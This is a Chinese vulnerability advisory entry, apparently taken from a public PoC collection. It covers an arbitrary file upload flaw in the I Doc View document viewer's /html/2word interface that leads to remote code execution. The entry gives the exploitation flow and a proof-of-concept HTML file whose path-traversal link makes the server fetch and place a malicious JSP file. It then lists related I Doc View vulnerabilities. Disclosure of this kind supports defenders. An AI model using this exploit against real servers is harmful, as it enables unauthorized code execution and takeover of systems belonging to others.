I Doc View任意文件上传漏洞

日期: 2024-01-02 | 影响软件: I Doc View | POC: 已公开

漏洞描述

I DOCVIEW是一个在线的文档查看器，其中的/html/2word接口因为处理不当，导致可以远程读取任意文件，通过这个接口导致服务器下载恶意的JSP进行解析，从而RCE。

PoC代码[已公开]



## I Doc View任意文件上传漏洞

I DOC VIEW是一个在线的文档查看器，其中的/html/2word接口因为处理不当，导致可以远程读取任意文件，通过这个接口导致服务器下载恶意的JSP进行解析，从而RCE。



## POC构造

流程：携带恶意link[href]的html -> 远程获取  -> 解析出href -> 远程获取恶意文件



poc.html

```html



<!DOCTYPE html>

<html lang="en">

<head>

    <title>test</title>  

</head>

<body>

  <link href="/..\..\..\docview\poc.jsp">

</body>

</html>

```

然后构造 `..\..\..\docview\poc.jsp`  这个是文件

![image](https://github.com/wy876/POC/assets/139549762/736f7c0a-4f06-4170-805a-cf1580b69de3)



![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)



## 漏洞分析

```

https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg

https://mp.weixin.qq.com/s/mD4EcVmJ9QPmmMLh6KrZ0g

```

来源: https://github.com/wy876/POC/assets/139549762/736f7c0a-4f06-4170-805a-cf1580b69de3)

漏洞描述

PoC代码[已公开]

相关漏洞推荐

I Doc View cmd.json远程代码执行漏洞 无POC

I Doc View upload任意文件读取漏洞 无POC

I Doc View在线文档预览系统 view任意文件读取漏洞 无POC

idocview-2word-fileupload: I Doc View /html/2word 任意文件上传漏洞 POC

idocview-fileread: I Doc View任意文件读取漏洞 POC

I Doc View cmd.json远程代码执行漏洞无POC

I Doc View upload任意文件读取漏洞无POC

I Doc View在线文档预览系统 view任意文件读取漏洞无POC